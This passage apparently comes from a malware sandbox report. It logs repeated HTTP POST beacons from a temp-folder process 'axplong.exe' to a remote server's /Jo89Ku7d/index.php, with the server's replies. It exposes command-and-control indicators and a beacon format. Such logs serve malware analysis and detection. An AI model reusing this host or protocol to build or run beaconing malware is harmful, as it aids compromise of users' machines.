27	192.168.2.4	49763	185.215.113.16	80	1220	C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe

Timestamp	Bytes transferred	Direction	Data
Sep 27, 2024 00:20:41.592134953 CEST	156	OUT	POST /Jo89Ku7d/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.16 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Sep 27, 2024 00:20:42.294118881 CEST	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Thu, 26 Sep 2024 22:20:42 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0
Sep 27, 2024 00:20:42.294837952 CEST	308	OUT	POST /Jo89Ku7d/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.16 Content-Length: 154 Cache-Control: no-cache Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 43 46 44 41 31 34 30 43 32 46 33 46 44 33 33 43 32 30 36 42 43 42 38 30 43 30 42 34 43 37 39 36 36 44 30 41 42 34 43 36 45 43 32 38 41 42 33 31 35 36 44 38 30 34 32 35 42 30 39 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6CCFDA140C2F3FD33C206BCB80C0B4C7966D0AB4C6EC28AB3156D80425B09
Sep 27, 2024 00:20:42.520149946 CEST	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Thu, 26 Sep 2024 22:20:42 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
28	192.168.2.4	49764	185.215.113.16	80	1220	C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe

Timestamp	Bytes transferred	Direction	Data
Sep 27, 2024 00:20:42.640633106 CEST	156	OUT	POST /Jo89Ku7d/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.16 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Sep 27, 2024 00:20:43.367151976 CEST	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Thu, 26 Sep 2024 22:20:43 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0
Sep 27, 2024 00:20:43.368285894 CEST	308	OUT	POST /Jo89Ku7d/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.16 Content-Length: 154 Cache-Control: no-cache Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 43 46 44 41 31 34 30 43 32 46 33 46 44 33 33 43 32 30 36 42 43 42 38 30 43 30 42 34 43 37 39 36 36 44 30 41 42 34 43 36 45 43 32 38 41 42 33 31 35 36 44 38 30 34 32 35 42 30 39 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6CCFDA140C2F3FD33C206BCB80C0B4C7966D0AB4C6EC28AB3156D80425B09
Sep 27, 2024 00:20:43.622028112 CEST	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Thu, 26 Sep 2024 22:20:43 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
29	192.168.2.4	49765	185.215.113.16	80	1220	C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe

Timestamp	Bytes transferred	Direction	Data
Sep 27, 2024 00:20:43.732006073 CEST	156	OUT	POST /Jo89Ku7d/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.16 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Sep 27, 2024 00:20:44.554619074 CEST	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Thu, 26 Sep 2024 22:20:44 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0
Sep 27, 2024 00:20:44.556567907 CEST	308	OUT	POST /Jo89Ku7d/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.16 Content-Length: 154 Cache-Control: no-cache Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 43 46 44 41 31 34 30 43 32 46 33 46 44 33 33 43 32 30 36 42 43 42 38 30 43 30 42 34 43 37 39 36 36 44 30 41 42 34 43 36 45 43 32 38 41 42 33 31 35 36 44 38 30 34 32 35 42 30 39 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6CCFDA140C2F3FD33C206BCB80C0B4C7966D0AB4C6EC28AB3156D80425B09
Sep 27, 2024 00:20:44.789716005 CEST	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Thu, 26 Sep 2024 22:20:44 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
30	192.168.2.4	49766	185.215.113.16	80	1220	C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe

Timestamp	Bytes transferred	Direction	Data
Sep 27, 2024 00:20:44.904561043 CEST	156	OUT	POST /Jo89Ku7d/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.16 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Sep 27, 2024 00:20:45.633390903 CEST	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Thu, 26 Sep 2024 22:20:45 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0
Sep 27, 2024 00:20:45.635934114 CEST	308	OUT	POST /Jo89Ku7d/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.16 Content-Length: 154 Cache-Control: no-cache Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 43 46 44 41 31 34 30 43 32 46 33 46 44 33 33 43 32 30 36 42 43 42 38 30 43 30 42 34 43 37 39 36 36 44 30 41 42 34 43 36 45 43 32 38 41 42 33 31 35 36 44 38 30 34 32 35 42 30 39 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6CCFDA140C2F3FD33C206BCB80C0B4C7966D0AB4C6EC28AB3156D80425B09
Sep 27, 2024 00:20:45.864634991 CEST	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Thu, 26 Sep 2024 22:20:45 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
31	192.168.2.4	49767	185.215.113.16	80	1220	C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe

Timestamp	Bytes transferred	Direction	Data
Sep 27, 2024 00:20:45.984148979 CEST	156	OUT	POST /Jo89Ku7d/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.16 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Sep 27, 2024 00:20:46.685403109 CEST	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Thu, 26 Sep 2024 22:20:46 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0
Sep 27, 2024 00:20:46.687889099 CEST	308	OUT	POST /Jo89Ku7d/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.16 Content-Length: 154 Cache-Control: no-cache Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 43 46 44 41 31 34 30 43 32 46 33 46 44 33 33 43 32 30 36 42 43 42 38 30 43 30 42 34 43 37 39 36 36 44 30 41 42 34 43 36 45 43 32 38 41 42 33 31 35 36 44 38 30 34 32 35 42 30 39 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6CCFDA140C2F3FD33C206BCB80C0B4C7966D0AB4C6EC28AB3156D80425B09
Sep 27, 2024 00:20:46.927462101 CEST	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Thu, 26 Sep 2024 22:20:46 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
32	192.168.2.4	49768	185.215.113.16	80	1220	C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe

Timestamp	Bytes transferred	Direction	Data
Sep 27, 2024 00:20:47.055138111 CEST	156	OUT	POST /Jo89Ku7d/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.16 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Sep 27, 2024 00:20:47.783771992 CEST	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Thu, 26 Sep 2024 22:20:47 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0
Sep 27, 2024 00:20:47.857543945 CEST	308	OUT	POST /Jo89Ku7d/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.16 Content-Length: 154 Cache-Control: no-cache Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 43 46 44 41 31 34 30 43 32 46 33 46 44 33 33 43 32 30 36 42 43 42 38 30 43 30 42 34 43 37 39 36 36 44 30 41 42 34 43 36 45 43 32 38 41 42 33 31 35 36 44 38 30 34 32 35 42 30 39 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6CCFDA140C2F3FD33C206BCB80C0B4C7966D0AB4C6EC28AB3156D80425B09
Sep 27, 2024 00:20:48.094003916 CEST	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Thu, 26 Sep 2024 22:20:47 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
33	192.168.2.4	49769	185.215.113.16	80	1220	C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe

Timestamp	Bytes transferred	Direction	Data
Sep 27, 2024 00:20:48.216382980 CEST	156	OUT	POST /Jo89Ku7d/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.16 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Sep 27, 2024 00:20:48.907877922 CEST	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Thu, 26 Sep 2024 22:20:48 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0
Sep 27, 2024 00:20:48.908798933 CEST	308	OUT	POST /Jo89Ku7d/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.16 Content-Length: 154 Cache-Control: no-cache Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 43 46 44 41 31 34 30 43 32 46 33 46 44 33 33 43 32 30 36 42 43 42 38 30 43 30 42 34 43 37 39 36 36 44 30 41 42 34 43 36 45 43 32 38 41 42 33 31 35 36 44 38 30 34 32 35 42 30 39 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6CCFDA140C2F3FD33C206BCB80C0B4C7966D0AB4C6EC28AB3156D80425B09
Sep 27, 2024 00:20:49.130883932 CEST	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Thu, 26 Sep 2024 22:20:49 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
34	192.168.2.4	49770	185.215.113.16	80	1220	C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe

Timestamp	Bytes transferred	Direction	Data
Sep 27, 2024 00:20:49.247442961 CEST	156	OUT	POST /Jo89Ku7d/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.16 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Sep 27, 2024 00:20:49.967483997 CEST	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Thu, 26 Sep 2024 22:20:49 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0
Sep 27, 2024 00:20:49.968365908 CEST	308	OUT	POST /Jo89Ku7d/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.16 Content-Length: 154 Cache-Control: no-cache Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 43 46 44 41 31 34 30 43 32 46 33 46 44 33 33 43 32 30 36 42 43 42 38 30 43 30 42 34 43 37 39 36 36 44 30 41 42 34 43 36 45 43 32 38 41 42 33 31 35 36 44 38 30 34 32 35 42 30 39 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6CCFDA140C2F3FD33C206BCB80C0B4C7966D0AB4C6EC28AB3156D80425B09
Sep 27, 2024 00:20:50.201533079 CEST	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Thu, 26 Sep 2024 22:20:50 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
35	192.168.2.4	49771	185.215.113.16	80	1220	C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe

Timestamp	Bytes transferred	Direction	Data
Sep 27, 2024 00:20:50.316247940 CEST	156	OUT	POST /Jo89Ku7d/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.16 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Sep 27, 2024 00:20:51.045465946 CEST	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Thu, 26 Sep 2024 22:20:50 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0
Sep 27, 2024 00:20:51.046410084 CEST	308	OUT	POST /Jo89Ku7d/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.16 Content-Length: 154 Cache-Control: no-cache Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 43 46 44 41 31 34 30 43 32 46 33 46 44 33 33 43 32 30 36 42 43 42 38 30 43 30 42 34 43 37 39 36 36 44 30 41 42 34 43 36 45 43 32 38 41 42 33 31 35 36 44 38 30 34 32 35 42 30 39 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6CCFDA140C2F3FD33C206BCB80C0B4C7966D0AB4C6EC28AB3156D80425B09
Sep 27, 2024 00:20:51.279191017 CEST	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Thu, 26 Sep 2024 22:20:51 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
36	192.168.2.4	49772	185.215.113.16	80	1220	C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe

Timestamp	Bytes transferred	Direction	Data
Sep 27, 2024 00:20:51.389867067 CEST	156	OUT	POST /Jo89Ku7d/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.16 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Sep 27, 2024 00:20:52.095688105 CEST	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Thu, 26 Sep 2024 22:20:51 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0
Sep 27, 2024 00:20:52.096549988 CEST	308	OUT	POST /Jo89Ku7d/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.16 Content-Length: 154 Cache-Control: no-cache Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 43 46 44 41 31 34 30 43 32 46 33 46 44 33 33 43 32 30 36 42 43 42 38 30 43 30 42 34 43 37 39 36 36 44 30 41 42 34 43 36 45 43 32 38 41 42 33 31 35 36 44 38 30 34 32 35 42 30 39 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6CCFDA140C2F3FD33C206BCB80C0B4C7966D0AB4C6EC28AB3156D80425B09
Sep 27, 2024 00:20:52.325617075 CEST	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Thu, 26 Sep 2024 22:20:52 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
37	192.168.2.4	49773	185.215.113.16	80	1220	C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe

Timestamp	Bytes transferred	Direction	Data
Sep 27, 2024 00:20:52.437758923 CEST	156	OUT	POST /Jo89Ku7d/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.16 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Sep 27, 2024 00:20:53.134936094 CEST	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Thu, 26 Sep 2024 22:20:53 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0
Sep 27, 2024 00:20:53.135987043 CEST	308	OUT	POST /Jo89Ku7d/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.16 Content-Length: 154 Cache-Control: no-cache Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 43 46 44 41 31 34 30 43 32 46 33 46 44 33 33 43 32 30 36 42 43 42 38 30 43 30 42 34 43 37 39 36 36 44 30 41 42 34 43 36 45 43 32 38 41 42 33 31 35 36 44 38 30 34 32 35 42 30 39 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6CCFDA140C2F3FD33C206BCB80C0B4C7966D0AB4C6EC28AB3156D80425B09
Sep 27, 2024 00:20:53.361330032 CEST	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Thu, 26 Sep 2024 22:20:53 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
38	192.168.2.4	49774	185.215.113.16	80	1220	C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe

Timestamp	Bytes transferred	Direction	Data
Sep 27, 2024 00:20:53.483159065 CEST	156	OUT	POST /Jo89Ku7d/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.16 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Sep 27, 2024 00:20:54.304513931 CEST	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Thu, 26 Sep 2024 22:20:54 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0
Sep 27, 2024 00:20:54.305737972 CEST	308	OUT	POST /Jo89Ku7d/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.16 Content-Length: 154 Cache-Control: no-cache Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 43 46 44 41 31 34 30 43 32 46 33 46 44 33 33 43 32 30 36 42 43 42 38 30 43 30 42 34 43 37 39 36 36 44 30 41 42 34 43 36 45 43 32 38 41 42 33 31 35 36 44 38 30 34 32 35 42 30 39 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6CCFDA140C2F3FD33C206BCB80C0B4C7966D0AB4C6EC28AB3156D80425B09
Sep 27, 2024 00:20:54.538002014 CEST	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Thu, 26 Sep 2024 22:20:54 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
39	192.168.2.4	49775	185.215.113.16	80	1220	C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe

Timestamp	Bytes transferred	Direction	Data
Sep 27, 2024 00:20:54.705497980 CEST	156	OUT	POST /Jo89Ku7d/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.16 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Sep 27, 2024 00:20:55.415662050 CEST	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Thu, 26 Sep 2024 22:20:55 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0
